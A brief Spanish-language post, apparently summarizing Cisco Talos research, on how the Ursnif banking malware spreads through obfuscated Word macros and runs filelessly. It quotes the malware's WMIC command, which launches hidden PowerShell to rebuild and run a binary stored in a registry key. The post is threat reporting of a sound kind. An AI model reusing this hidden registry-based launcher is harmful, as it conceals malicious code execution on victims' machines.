Ursnif es una familia malware bastante avanzado que perfecciona las técnicas de fileless al máximo. En las últimas muestras, se propaga a través de documentos Word con macros muy ofuscadas, con código fundamentalmente inútil y solo una línea funcional. De ahí descarga no un ejecutable, sino un comando que a su vez descargará el ejecutable.

Talos ha cubierto Ursnif en el pasado, ya que es uno de los programas maliciosos más populares que los atacantes han implementado recientemente. En abril, detectaron que Ursnif se estaba enviando a través de correos electrónicos maliciosos junto con el troyano bancario IceID.
Este ejecutable escribirá en una zona del registro la información necesaria para recrear un binario ofuscado en memoria. Y luego será invocado a través de un comando WMIC (con la salida redirigida al portapapeles) que a su vez llamará a un PowerShell que reconstruirá el binario.

C:\WINDOWS\system32\wbem\wmic.exe /output:clipboard process call create "powershell -w hidden iex([System.Text.Encoding]::
 ASCII.GetString((get-itemproperty 'HKCU:\Software\AppDataLow\Software\Microsoft\236FF8AB-268A-4D1B-4807-BAD1FC2B8E95').Authicap))"

Y la infección continuará con la subida al Command and Control de comandos comprimidos en formato .CAB.

Fuente: Talos